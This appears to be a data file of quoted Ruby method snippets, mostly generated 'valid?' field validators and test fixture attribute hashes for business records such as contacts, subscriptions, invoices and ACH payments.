"def valid?\n return false if !@external_id.nil? && @external_id.to_s.length > 64\n return false if !@first_name.nil? && @first_name.to_s.length > 128\n return false if @last_name.nil?\n return false if @last_name.to_s.length > 64\n return false if @last_name.to_s.length < 1\n return false if !@middle_name.nil? && @middle_name.to_s.length > 64\n gender_validator = EnumAttributeValidator.new('String', [\"M\", \"F\"])\n return false unless gender_validator.valid?(@gender)\n return false if !@language.nil? && @language.to_s.length > 32\n return false if !@phone.nil? && @phone.to_s.length > 64\n return false if !@email.nil? && @email.to_s.length > 128\n return false if !@doc_type.nil? && @doc_type.to_s.length > 32\n return false if !@doc_issuer_info.nil? && @doc_issuer_info.to_s.length > 256\n return false if !@doc_series.nil? && @doc_series.to_s.length > 64\n return false if !@doc_number.nil? && @doc_number.to_s.length > 64\n return false if !@department_code.nil? && @department_code.to_s.length > 64\n return false if !@department_name.nil? && @department_name.to_s.length > 256\n return false if !@building_no.nil? && @building_no.to_s.length > 8\n return false if !@city.nil? && @city.to_s.length > 32\n return false if !@country_code.nil? && @country_code.to_s.length > 8\n return false if !@country_name.nil? && @country_name.to_s.length > 64\n return false if !@district.nil? && @district.to_s.length > 64\n return false if !@flat_no.nil? && @flat_no.to_s.length > 8\n return false if !@house_no.nil? && @house_no.to_s.length > 16\n return false if !@region.nil? && @region.to_s.length > 64\n return false if !@room_no.nil? && @room_no.to_s.length > 8\n return false if !@settlement_type.nil? && @settlement_type.to_s.length > 32\n return false if !@street.nil? && @street.to_s.length > 64\n return false if !@raw_address.nil? && @raw_address.to_s.length > 512\n true\n end",
"def only_some_attributes_filled?(ar)\n ar.attributes_filled < AppConfig['contact_info.complete_percentage'].to_f\n end",
"def valid?\n return false if @handle.nil?\n return false if @customer.nil?\n return false if @plan.nil?\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"active\", \"expired\", \"on_hold\", \"pending\"])\n return false unless state_validator.valid?(@state)\n return false if @test.nil?\n return false if @quantity.nil?\n return false if @timezone.nil?\n return false if @created.nil?\n return false if @renewing.nil?\n return false if @plan_version.nil?\n return false if @start_date.nil?\n return false if @is_cancelled.nil?\n return false if @in_trial.nil?\n return false if @has_started.nil?\n return false if @renewal_count.nil?\n return false if @renewal_count < 0\n expire_reason_validator = EnumAttributeValidator.new('String', [\"dunning\", \"cancelled\", \"ondemand\", \"fixed\"])\n return false unless expire_reason_validator.valid?(@expire_reason)\n on_hold_reason_validator = EnumAttributeValidator.new('String', [\"dunning\", \"ondemand\"])\n return false unless on_hold_reason_validator.valid?(@on_hold_reason)\n return false if @payment_method_added.nil?\n return false if @reminder_email_sent.nil?\n return false if @failed_invoices.nil?\n return false if @failed_amount.nil?\n return false if @cancelled_invoices.nil?\n return false if @cancelled_amount.nil?\n return false if @pending_invoices.nil?\n return false if @pending_amount.nil?\n return false if @dunning_invoices.nil?\n return false if @dunning_amount.nil?\n return false if @settled_invoices.nil?\n return false if @settled_amount.nil?\n return false if @refunded_amount.nil?\n return false if @pending_additional_costs.nil?\n return false if @pending_additional_cost_amount.nil?\n return false if @transferred_additional_costs.nil?\n return false if @transferred_additional_cost_amount.nil?\n return false if @pending_credits.nil?\n return false if @pending_credit_amount.nil?\n return false if @transferred_credits.nil?\n return false if @transferred_credit_amount.nil?\n return false if @hosted_page_links.nil?\n return true\n end",
"def valid?(json: {})\n json.present? && json[:license_ref].present? && json[:start_date].present?\n end",
"def verify_nilness_params(yearly_cost, yearly_consumption, floor_space, heat_type, water_cooking_type, nb_residents)\n if yearly_cost.zero? # if he forgot the yearly cost\n false\n else\n if yearly_consumption.zero? # if the consumption is not entered, all the other field must be present\n if [floor_space, nb_residents].include?(0) || [heat_type, water_cooking_type].include?('')\n false\n else\n true\n end\n else\n true\n end\n end\n end",
"def required_params_present?\n\n render json: {error: 'Missing required parameter: result'},\n status: :bad_request and return false unless params[:result]\n\n render json: {error: 'Missing required parameter: result.result_type'},\n status: :bad_request and return false unless params[:result][:result_type]\n\n # Manual Results are required to provide the execution id.\n # All other results are required to provide the project_id\n if params['result']['result_type'] == 'manual'\n render json: {error: 'Missing required parameter: result.execution_id'},\n status: :bad_request and return false unless params[:result][:execution_id]\n else\n render json: {error: 'Missing required parameter: result.project_id'},\n status: :bad_request and return false unless params[:result][:project_id]\n end\n\n\n render json: {error: 'Missing required parameter: result.testcase_id'},\n status: :bad_request and return false unless params[:result][:testcase_id]\n\n render json: {error: 'Missing required parameter: result.environment_id'},\n status: :bad_request and return false unless params[:result][:environment_id]\n\n\n render json: {error: 'Missing required parameter: result.status'},\n status: :bad_request and return false unless params[:result][:status]\n\n true\n end",
"def valid?\n return false if @identifier.nil?\n return false if @identifier.to_s.length > 25\n return false if @name.nil?\n return false if @name.to_s.length > 50\n return false if @status.nil?\n return false if @type.nil?\n return false if @address_line1.nil?\n return false if @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state.nil? && @state.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@phone_number.nil? && @phone_number.to_s.length > 30\n return false if !@fax_number.nil? && @fax_number.to_s.length > 30\n return false if !@website.nil? && @website.to_s.length > 255\n return false if !@account_number.nil? && @account_number.to_s.length > 100\n return false if !@lead_source.nil? && @lead_source.to_s.length > 50\n return false if !@user_defined_field1.nil? && @user_defined_field1.to_s.length > 50\n return false if !@user_defined_field2.nil? && @user_defined_field2.to_s.length > 50\n return false if !@user_defined_field3.nil? && @user_defined_field3.to_s.length > 50\n return false if !@user_defined_field4.nil? && @user_defined_field4.to_s.length > 50\n return false if !@user_defined_field5.nil? && @user_defined_field5.to_s.length > 50\n return false if !@user_defined_field6.nil? && @user_defined_field6.to_s.length > 50\n return false if !@user_defined_field7.nil? && @user_defined_field7.to_s.length > 50\n return false if !@user_defined_field8.nil? && @user_defined_field8.to_s.length > 50\n return false if !@user_defined_field9.nil? && @user_defined_field9.to_s.length > 50\n return false if !@user_defined_field10.nil? && @user_defined_field10.to_s.length > 50\n return true\n end",
"def determine_date\n if !params[:date_start].blank? && !params[:date_end].blank?\n @date_start = params[:date_start]\n @date_end = params[:date_end]\n else\n determine_date_now\n end\n end",
"def valid?\n return false if @default_department_id.nil?\n return false if !@default_email.nil? && @default_email.to_s.length > 250\n return false if @default_location_id.nil?\n return false if !@default_phone.nil? && @default_phone.to_s.length > 15\n return false if @expense_approver.nil?\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if !@home_email.nil? && @home_email.to_s.length > 250\n return false if !@home_extension.nil? && @home_extension.to_s.length > 10\n return false if !@home_phone.nil? && @home_phone.to_s.length > 15\n return false if @identifier.nil?\n return false if @identifier.to_s.length > 15\n return false if @last_name.nil?\n return false if @last_name.to_s.length > 30\n return false if @license_class.nil?\n license_class_validator = EnumAttributeValidator.new('String', [\"F\", \"A\", \"C\", \"X\"])\n return false unless license_class_validator.valid?(@license_class)\n return false if !@mobile_email.nil? && @mobile_email.to_s.length > 250\n return false if !@mobile_extension.nil? && @mobile_extension.to_s.length > 10\n return false if !@mobile_phone.nil? && @mobile_phone.to_s.length > 15\n return false if !@office_email.nil? && @office_email.to_s.length > 250\n return false if !@office_extension.nil? && @office_extension.to_s.length > 10\n return false if !@office_phone.nil? && @office_phone.to_s.length > 15\n return false if @sales_default_location_id.nil?\n return false if @time_approver.nil?\n return false if @time_zone.nil?\n return false if !@title.nil? && @title.to_s.length > 50\n return false if @work_role.nil?\n return true\n end",
"def valid_attributes\n hash = @time_record.attributes.reject {|k,v| %w{id user_id pay_period_id created_at updated_at}.include?(k)}\n end",
"def criterion_list searchable_attr = {}, formats ={}, criteria = {}\n\n searchable_attr.each{|attr|\n criterion_key = attr_2_criterion_sym(attr)\n #operator_key = attr_2_operator(attr)\n if params[criterion_key] then\n if not params[criterion_key].blank? then\n if criterion_key.to_s.ends_with?('_date') || criterion_key.to_s.ends_with?('_at') then\n # This is a bit shakey: duck programming at its \"best\" providing you know ath all date attributes must end with \"_date\"\n #criteria[attr] = DateTime.strptime(params[criterion_key], ((formats[criterion_key].nil?)?t($DF + \"default\") : t(formats[criterion_key])))\n criteria[attr] = DateTime.strptime(params[criterion_key], ((formats[criterion_key].nil?)?$DATE_TRANSFER_FORMAT : t(formats[criterion_key])))\n else\n criteria[attr] =params[criterion_key]\n end\n #else\n \n \n end # not blank\n end \n }\n return criteria\n end",
"def has_dates(*attrs)\n options = attrs.extract_options!\n attrs.each do |attr|\n\n attr_reader attr\n define_reader_with_options(attr,options)\n define_method(\"#{attr.to_s}=\") do |val| \n val = val.to_date unless val.nil?\n instance_variable_set(\"@#{attr}\", val )\n attributes[attr] = val\n val\n\n end\n end\n end",
"def valid?\n return false if @address1.nil?\n return false if @address1.to_s.length > 100\n return false if @address1.to_s.length < 1\n return false if !@address2.nil? && @address2.to_s.length > 100\n return false if @amount.nil?\n return false if @amount > 10000000\n return false if @amount < 1\n return false if !@business_description.nil? && @business_description.to_s.length > 500\n business_type_validator = EnumAttributeValidator.new('String', [\"corporate\", \"individual\"])\n return false unless business_type_validator.valid?(@business_type)\n return false if !@corporate_number.nil? && @corporate_number !~ Regexp.new(/^\\\\d{13}$/)\n return false if @email.nil?\n return false if @end_date.nil?\n return false if @prefecture.nil?\n prefecture_validator = EnumAttributeValidator.new('String', [\"北海道\", \"青森県\", \"岩手県\", \"宮城県\", \"秋田県\", \"山形県\", \"福島県\", \"茨城県\", \"栃木県\", \"群馬県\", \"埼玉県\", \"千葉県\", \"東京都\", \"神奈川県\", \"新潟県\", \"富山県\", \"石川県\", \"福井県\", \"山梨県\", \"長野県\", \"岐阜県\", \"静岡県\", \"愛知県\", \"三重県\", \"滋賀県\", \"京都府\", \"大阪府\", \"兵庫県\", \"奈良県\", \"和歌山県\", \"鳥取県\", \"島根県\", \"岡山県\", \"広島県\", \"山口県\", \"徳島県\", \"香川県\", \"愛媛県\", \"高知県\", \"福岡県\", \"佐賀県\", \"長崎県\", \"熊本県\", \"大分県\", \"宮崎県\", \"鹿児島県\", \"沖縄県\"])\n return false unless prefecture_validator.valid?(@prefecture)\n return false if !@remark.nil? && @remark.to_s.length > 500\n return false if !@representative_name.nil? && @representative_name.to_s.length > 30\n return false if @tel.nil?\n return false if @tel !~ Regexp.new(/^0((\\\\d{1,2}-?\\\\d{1,4}|\\\\d{3,4}-?\\\\d{1,2})-?\\\\d{4}|120-?\\\\d{3}-?\\\\d{3})$/)\n return false if !@url.nil? && @url.to_s.length > 500\n return false if @zip_code.nil?\n return false if @zip_code !~ Regexp.new(/^\\\\d{3}-?\\\\d{4}$/)\n return true\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length > 50\n return false if @prefix_suffix_option.nil?\n prefix_suffix_option_validator = EnumAttributeValidator.new('String', [\"Prefix\", \"Suffix\"])\n return false unless prefix_suffix_option_validator.valid?(@prefix_suffix_option)\n return false if !@invoice_pre_suffix.nil? && @invoice_pre_suffix.to_s.length > 5\n application_units_validator = EnumAttributeValidator.new('String', [\"Amount\", \"Hours\", \"Incidents\"])\n return false unless application_units_validator.valid?(@application_units)\n application_cycle_validator = EnumAttributeValidator.new('String', [\"Contract2Weeks\", \"Contract4Weeks\", \"ContractYear\", \"CalendarMonth\", \"CalendarQuarter\", \"CalendarWeek\", \"ContractQuarter\", \"CalendarYear\"])\n return false unless application_cycle_validator.valid?(@application_cycle)\n return false if @employee_comp_rate.nil?\n employee_comp_rate_validator = EnumAttributeValidator.new('String', [\"Actual\", \"Hourly\"])\n return false unless employee_comp_rate_validator.valid?(@employee_comp_rate)\n return false if @employee_comp_not_exceed.nil?\n employee_comp_not_exceed_validator = EnumAttributeValidator.new('String', [\"Billing\", \"Percent\", \"Amount\"])\n return false unless employee_comp_not_exceed_validator.valid?(@employee_comp_not_exceed)\n return false if @invoicing_cycle.nil?\n invoicing_cycle_validator = EnumAttributeValidator.new('String', [\"CalendarYear\", \"ContractYear\"])\n return false unless invoicing_cycle_validator.valid?(@invoicing_cycle)\n return false if !@invoice_description.nil? && @invoice_description.to_s.length > 4000\n return false if @bill_time.nil?\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n return false if @bill_expenses.nil?\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n return false if @bill_products.nil?\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n return true\n end",
"def valid?\n return false if @remit_name.nil?\n return false if @remit_name.to_s.length > 50\n return false if @location.nil?\n return false if !@address_one.nil? && @address_one.to_s.length > 50\n return false if !@address_two.nil? && @address_two.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@phone.nil? && @phone.to_s.length > 15\n return false if @invoice_title.nil?\n return false if @invoice_title.to_s.length > 50\n return false if @payable_name.nil?\n return false if @payable_name.to_s.length > 50\n return false if !@topcomment.nil? && @topcomment.to_s.length > 4000\n return false if !@invoice_footer.nil? && @invoice_footer.to_s.length > 500\n return false if !@quote_footer.nil? && @quote_footer.to_s.length > 1000\n return false if @overall_invoice_default.nil?\n prefix_suffix_flag_validator = EnumAttributeValidator.new('String', [\"Prefix\", \"Suffix\"])\n return false unless prefix_suffix_flag_validator.valid?(@prefix_suffix_flag)\n return false if !@prefix_suffix_text.nil? && @prefix_suffix_text.to_s.length > 5\n return false if @email_template.nil?\n return false if !@business_number.nil? && @business_number.to_s.length > 50\n return false if !@custom_label.nil? && @custom_label.to_s.length > 50\n return false if !@custom_text.nil? && @custom_text.to_s.length > 500\n return false if !@company_code.nil? && @company_code.to_s.length > 250\n return true\n end",
"def valid?\n return false if @employee_id.nil?\n return false if @leave_type_id.nil?\n return false if @start_date.nil?\n return false if @end_date.nil?\n return false if @work_pattern.nil?\n return false if @is_pregnancy_related.nil?\n return false if @sufficient_notice.nil?\n true\n end",
"def valid?\n return false if @date.nil?\n return false if @campaign_revenue.nil?\n return false if @total_campaign_revenue.nil?\n return false if @campaign_refund.nil?\n return false if @total_campaign_refund.nil?\n return false if @campaign_discount_costs.nil?\n return false if @total_campaign_discount_costs.nil?\n return false if @campaign_refunded_discounts.nil?\n return false if @total_campaign_refunded_discounts.nil?\n return false if @campaign_free_items.nil?\n return false if @total_campaign_free_items.nil?\n return false if @coupon_redemptions.nil?\n return false if @total_coupon_redemptions.nil?\n return false if @coupon_rolledback_redemptions.nil?\n return false if @total_coupon_rolledback_redemptions.nil?\n return false if @referral_redemptions.nil?\n return false if @total_referral_redemptions.nil?\n return false if @coupons_created.nil?\n return false if @total_coupons_created.nil?\n return false if @referrals_created.nil?\n return false if @total_referrals_created.nil?\n return false if @added_loyalty_points.nil?\n return false if @total_added_loyalty_points.nil?\n return false if @deducted_loyalty_points.nil?\n return false if @total_deducted_loyalty_points.nil?\n true\n end",
"def valid_attributes\r\n {\r\n :item_id => 2,\r\n :seller_id => 1,\r\n :bid_amount => 100,\r\n :highest_bidder => 2,\r\n :state => 1,\r\n :end_time => Time.now\r\n }\r\n end",
"def valid?\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n if @metadata.nil?\n return false\n end\n\n \n \n \n \n \n \n \n \n end",
"def check_required_attributes\n attributes = DSL.attributes.values.select(&:required?)\n attributes.each do |attr|\n value = spec.send(attr.name)\n unless value && (!value.respond_to?(:empty?) || !value.empty?)\n if attr.name == :license\n results.add_warning('attributes', 'Missing required attribute ' \\\n \"`#{attr.name}`.\")\n else\n results.add_error('attributes', 'Missing required attribute ' \\\n \"`#{attr.name}`.\")\n end\n end\n end\n end",
"def validate_mandatory_fields\n validate_for_card unless self.cc_number.blank?\n validate_for_transaction_tag unless self.transaction_tag.blank?\n validate_for_track1 unless self.track1.blank?\n validate_for_track2 unless self.track2.blank?\n end",
"def valid?\n return false if @identifier.nil?\n return false if @identifier.to_s.length > 15\n return false if !@password.nil? && @password.to_s.length > 60\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if @last_name.nil?\n return false if @last_name.to_s.length > 30\n return false if !@title.nil? && @title.to_s.length > 50\n return false if @license_class.nil?\n license_class_validator = EnumAttributeValidator.new('String', [\"F\", \"A\", \"C\", \"X\"])\n return false unless license_class_validator.valid?(@license_class)\n return false if !@employee_identifer.nil? && @employee_identifer.to_s.length > 10\n return false if @time_zone.nil?\n return false if !@office_email.nil? && @office_email.to_s.length > 250\n return false if !@office_phone.nil? && @office_phone.to_s.length > 15\n return false if !@office_extension.nil? && @office_extension.to_s.length > 10\n return false if !@mobile_email.nil? && @mobile_email.to_s.length > 250\n return false if !@mobile_phone.nil? && @mobile_phone.to_s.length > 15\n return false if !@mobile_extension.nil? && @mobile_extension.to_s.length > 10\n return false if !@home_email.nil? && @home_email.to_s.length > 250\n return false if !@home_phone.nil? && @home_phone.to_s.length > 15\n return false if !@home_extension.nil? && @home_extension.to_s.length > 10\n return false if @default_email.nil?\n default_email_validator = EnumAttributeValidator.new('String', [\"Office\", \"Mobile\", \"Home\"])\n return false unless default_email_validator.valid?(@default_email)\n return false if @default_phone.nil?\n default_phone_validator = EnumAttributeValidator.new('String', [\"Office\", \"Mobile\", \"Home\"])\n return false unless default_phone_validator.valid?(@default_phone)\n return false if @security_role.nil?\n return false if @structure_level.nil?\n return false if @security_location.nil?\n return false if @default_location.nil?\n return false if @default_department.nil?\n return false if @work_role.nil?\n return false if @time_approver.nil?\n return false if @expense_approver.nil?\n return false if @hire_date.nil?\n return false if @sales_default_location.nil?\n return false if !@ldap_user_name.nil? && @ldap_user_name.to_s.length > 50\n return false if @company_activity_tab_format.nil?\n company_activity_tab_format_validator = EnumAttributeValidator.new('String', [\"SummaryList\", \"DetailList\"])\n return false unless company_activity_tab_format_validator.valid?(@company_activity_tab_format)\n return false if @invoice_time_tab_format.nil?\n invoice_time_tab_format_validator = EnumAttributeValidator.new('String', [\"SummaryList\", \"DetailList\"])\n return false unless invoice_time_tab_format_validator.valid?(@invoice_time_tab_format)\n return false if @invoice_screen_default_tab_format.nil?\n invoice_screen_default_tab_format_validator = EnumAttributeValidator.new('String', [\"ShowInvoicingTab\", \"ShowAgreementInvoicingTab\"])\n return false unless invoice_screen_default_tab_format_validator.valid?(@invoice_screen_default_tab_format)\n return false if @invoicing_display_options.nil?\n invoicing_display_options_validator = EnumAttributeValidator.new('String', [\"RemainOnInvoicingScreen\", \"ShowRecentInvoices\"])\n return false unless invoicing_display_options_validator.valid?(@invoicing_display_options)\n return false if @agreement_invoicing_display_options.nil?\n agreement_invoicing_display_options_validator = EnumAttributeValidator.new('String', [\"RemainOnInvoicingScreen\", \"ShowRecentInvoices\"])\n return false unless agreement_invoicing_display_options_validator.valid?(@agreement_invoicing_display_options)\n return false if !@corelytics_username.nil? && @corelytics_username.to_s.length > 50\n return false if !@corelytics_password.nil? && @corelytics_password.to_s.length > 50\n remote_package_validator = EnumAttributeValidator.new('String', [\"LogMeIn\", \"NTR\"])\n return false unless remote_package_validator.valid?(@remote_package)\n return false if !@remote_package_platform.nil? && @remote_package_platform.to_s.length > 250\n return false if !@remote_package_user_name.nil? && @remote_package_user_name.to_s.length > 50\n return false if !@remote_package_password.nil? && @remote_package_password.to_s.length > 50\n return false if !@remote_package_account.nil? && @remote_package_account.to_s.length > 250\n authentication_service_type_validator = EnumAttributeValidator.new('String', [\"AuthAnvil\", \"GoogleAuthenticator\"])\n return false unless authentication_service_type_validator.valid?(@authentication_service_type)\n return true\n end",
"def valid_attributes\n { \"room_id\" => \"1\", \"check_in_time\" => DateTime.now, \"user_id\" => user.id }\n end",
"def valid?\n return false if @ach_type.nil?\n return false if @routing_number.nil?\n return false if @routing_number.to_s.length > 9\n return false if @routing_number.to_s.length < 9\n return false if @routing_number !~ Regexp.new(/^[0-9]+$/)\n return false if @account_number.nil?\n return false if @account_number.to_s.length > 56\n return false if @account_number.to_s.length < 1\n return false if @account_number !~ Regexp.new(/^[0-9]+$/)\n return false if @account_type.nil?\n account_type_validator = EnumAttributeValidator.new('String', [\"C\", \"S\"])\n return false unless account_type_validator.valid?(@account_type)\n return false if !@check_number.nil? && @check_number.to_s.length > 10\n return false if !@check_number.nil? && @check_number !~ Regexp.new(/^[0-9]+$/)\n return false if @check_type.nil?\n check_type_validator = EnumAttributeValidator.new('String', [\"P\", \"C\"])\n return false unless check_type_validator.valid?(@check_type)\n return false if !@product_code.nil? && @product_code.to_s.length > 6\n return false if !@product_code.nil? && @product_code !~ Regexp.new(/^[0-9]+$/)\n return false if !@agent_id.nil? && @agent_id.to_s.length > 6\n return false if !@agent_id.nil? && @agent_id !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n return false if !@terminal_id.nil? && @terminal_id.to_s.length > 10\n return false if !@terminal_id.nil? && @terminal_id !~ Regexp.new(/^[0-9]+$/)\n return false if !@registration_id.nil? && @registration_id.to_s.length > 50\n return false if !@registration_id.nil? && @registration_id !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n release_type_validator = EnumAttributeValidator.new('String', [\"C\", \"D\", \"P\", \"T\"])\n return false unless release_type_validator.valid?(@release_type)\n vip_customer_validator = EnumAttributeValidator.new('String', [\"Y\", \"N\"])\n return false unless vip_customer_validator.valid?(@vip_customer)\n return false if @session_id.nil?\n return false if @session_id.to_s.length > 128\n return false if @session_id !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n return false if !@terminal_state.nil? && @terminal_state.to_s.length > 2\n return false if !@terminal_state.nil? && @terminal_state !~ Regexp.new(/^[A-Z]{2}$/)\n return false if !@terminal_city.nil? && @terminal_city.to_s.length > 16\n return false if !@terminal_city.nil? && @terminal_city !~ Regexp.new(/(?=.*[^\\s])^[^|]+$/)\n true\n end",
"def build_conditions(conditions)\n conditions = [\"1=1\"] if conditions.blank?\n unless self.claim_id.blank?\n conditions[0] += \" and id = ?\"\n conditions << self.claim_id\n end\n unless self.organisation_id.blank?\n conditions[0] += \" and organisation_id = ?\"\n conditions << self.organisation_id\n end\n unless self.date_service_start.blank?\n conditions[0] += \" and date_service >= ?\"\n conditions << self.date_service_start\n end\n unless self.date_service_end.blank?\n conditions[0] += \" and date_service <= ?\"\n conditions << self.date_service_end\n end\n unless self.invoice_date_start.blank?\n conditions[0] += \" and invoice_date >= ?\"\n conditions << self.invoice_date_start\n end\n unless self.invoice_date_end.blank?\n conditions[0] += \" and invoice_date <= ?\"\n conditions << self.invoice_date_end\n end\n unless self.programme_id.blank?\n conditions[0] += \" and programme_id = ?\"\n conditions << self.programme_id\n end\n unless self.fee_schedule_id.blank?\n conditions[0] += \" and fee_schedule_id = ?\"\n conditions << self.fee_schedule_id\n end\n unless self.claim_status_id.blank?\n conditions[0] += \" and claim_status_id = ?\"\n conditions << self.claim_status_id\n end\n unless self.invoice_no.blank?\n conditions[0] += \" and invoice_no = ?\"\n conditions << self.invoice_no\n end\n if self.zero_value == 1 \n conditions[0] += \" and amount = 0\"\n end\n conditions\n end",
"def valid_attributes\n {\n :user_id=> 1 ,\n :credit_card_no =>\"1234567812345678\",\n :billing_address =>\"MyText\" ,\n :zipcode =>12345\n }\n end",
"def core_attributes_valid\n core_attributes = [@rateable, @rater, @ratee, @rating_type]\n return if core_attributes.all? { |atr| atr.present? && atr.valid? }\n errors.add('message', 'Not all core attributes present and valid.')\n end",
"def valid_attributes\n {\n first_name: \"Robin\",\n last_name: \"Dunlop\",\n gender: \"Male\",\n user_id: @user.id,\n birthday: Date.new(1982, 01, 19),\n contact_detail_attributes: {\n address: \"123 Fake Street\",\n city: \"Madison\",\n state: \"WI\",\n country_residence: \"US\",\n zip: \"12345\",\n club: \"TCUC\",\n club_contact: \"Connie\",\n usa_member_number: \"12345\",\n volunteer: false,\n emergency_name: \"Caitlin\",\n emergency_relationship: \"Sig. Oth.\",\n emergency_attending: true,\n emergency_primary_phone: \"306-222-1212\",\n emergency_other_phone: \"911\",\n responsible_adult_name: \"Andy\",\n responsible_adult_phone: \"312-555-5555\"\n }\n }\n end",
"def check_if_approval_is_required\n check_by_families || check_by_supplier || check_by_project ||\n check_by_office || check_by_company || check_by_zone\n end",
"def atributos\n valid = false\n if self.interreps_vencidos.any?\n valid = true\n\n elsif presente_reunioes == true\n valid = true\n end\n\n # elsif Time.now.year - ano_de_fundacao <= 1 \n # valid = true\n # end\n\n valid\n end",
"def set_derived_fields\n self.credit_for_mil_training = to_yes_string(vet2)\n self.vet_poc = to_yes_string(vet3)\n self.student_vet_grp_ipeds = to_yes_string(vet4)\n self.soc_member = to_yes_string(vet5)\n self.calendar = to_calendar(calsys)\n self.online_all = to_true_string(distnced)\n\n true\n end",
"def usable?\n codes.present? && (start_time.present? || end_time.present? || time.present?)\n end",
"def validations\n valid_page_number? if page_number\n valid_period_name? if period_param\n valid_date? if date_param\n end",
"def validate_payer_and_its_related_attributes\r\n result = true\r\n error_message = nil\r\n if !params[:payer].blank?\r\n payer_address_fields = {\r\n :address_one => params[:payer][:pay_address_one].to_s.strip,\r\n :city => params[:payer][:payer_city].to_s.strip,\r\n :state => params[:payer][:payer_state].to_s.strip,\r\n :zip_code => params[:payer][:payer_zip].to_s.strip\r\n }\r\n end\r\n if !params[:micr_line_information].blank?\r\n routing_number = params[:micr_line_information][:aba_routing_number]\r\n account_number = params[:micr_line_information][:payer_account_number]\r\n end\r\n \r\n result, error_message = validate_payer_address(payer_address_fields)\r\n logger.debug \"validate_payer_address result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = @payer.validate_payer_id(params[:payer][:payid])\r\n logger.debug \"validate_payer_id result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = @payer.validate_against_payer_duplication(params[:payer],\r\n params[:id], params[:micr_line_information])\r\n if !error_message.blank?\r\n @do_not_save_micr = true\r\n end\r\n logger.debug \"validate_against_payer_duplication result : #{result}\"\r\n message = error_message if result\r\n return result, error_message if not result\r\n \r\n result, error_message = @payer.validate_unique_payer_for_micr(routing_number, account_number)\r\n logger.debug \"validate_unique_payer_for_micr result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = @payer.validate_presence_of_eobs_when_payer_type_changes(params[:payer][:payer_type])\r\n logger.debug \"validate_presence_of_eobs_when_payer_type_changes result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_client_id(params[:facilities_micr_information],\r\n params[:serial_numbers_for_adding_onbase_name])\r\n logger.debug \"validate_client_id for Onbase Name result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_client_id(params[:facilities_payers_information],\r\n params[:serial_numbers_for_adding_output_payid])\r\n logger.debug \"validate_client_id for Output Payid result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_footnote_indicator_for_assigning_set_name\r\n logger.debug \"validate_footnote_indicator_for_assigning_set_name result : #{result}\"\r\n return result, error_message if not result\r\n\r\n result, error_message = validate_payment_and_allowance_and_capitation_codes\r\n logger.debug \"validate_payment_and_allowance_and_capitation_codes result : #{result}\"\r\n return result, error_message if not result\r\n \r\n error_message = message.to_s + error_message.to_s\r\n return result, error_message\r\n end",
"def registration_dates_given?\n if registration_start_date.blank? || registration_end_date.blank?\n false\n else\n true\n end\n end",
"def valid_attributes\n { :val_1 => 1.1,\n :val_2 => 2.2,\n :val_3 => 3.3,\n :val_4 => 4.4,\n :notes => \"hi\"\n }\n end",
"def valid?\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n if @total_servicos.nil?\n return false\n end\n\n \n \n \n \n \n if @total_parcelado_nacionais.nil?\n return false\n end\n\n \n \n \n \n \n if @total_parcelado_internacionais.nil?\n return false\n end\n\n \n \n \n \n end",
"def valid?\n \n if @account_id.nil?\n false\n elsif @campaign_id.nil?\n false\n elsif @csp_id.nil?\n false\n elsif @status.nil?\n false\n elsif @create_date.nil?\n false\n elsif @auto_renewal.nil?\n false\n elsif @brand_id.nil?\n false\n elsif @usecase.nil?\n false\n elsif @sub_usecases.nil?\n false\n elsif @description.nil?\n false\n elsif @embedded_link.nil?\n false\n elsif @embedded_phone.nil?\n false\n elsif @affiliate_marketing.nil?\n false\n elsif @number_pool.nil?\n false\n elsif @age_gated.nil?\n false\n elsif @direct_lending.nil?\n false\n elsif @subscriber_optin.nil?\n false\n elsif @subscriber_optout.nil?\n false\n elsif @subscriber_help.nil?\n false\n elsif @sample1.nil?\n false\n elsif @mock.nil?\n false\n else\n list_invalid_properties.length() == 0\n end\n end",
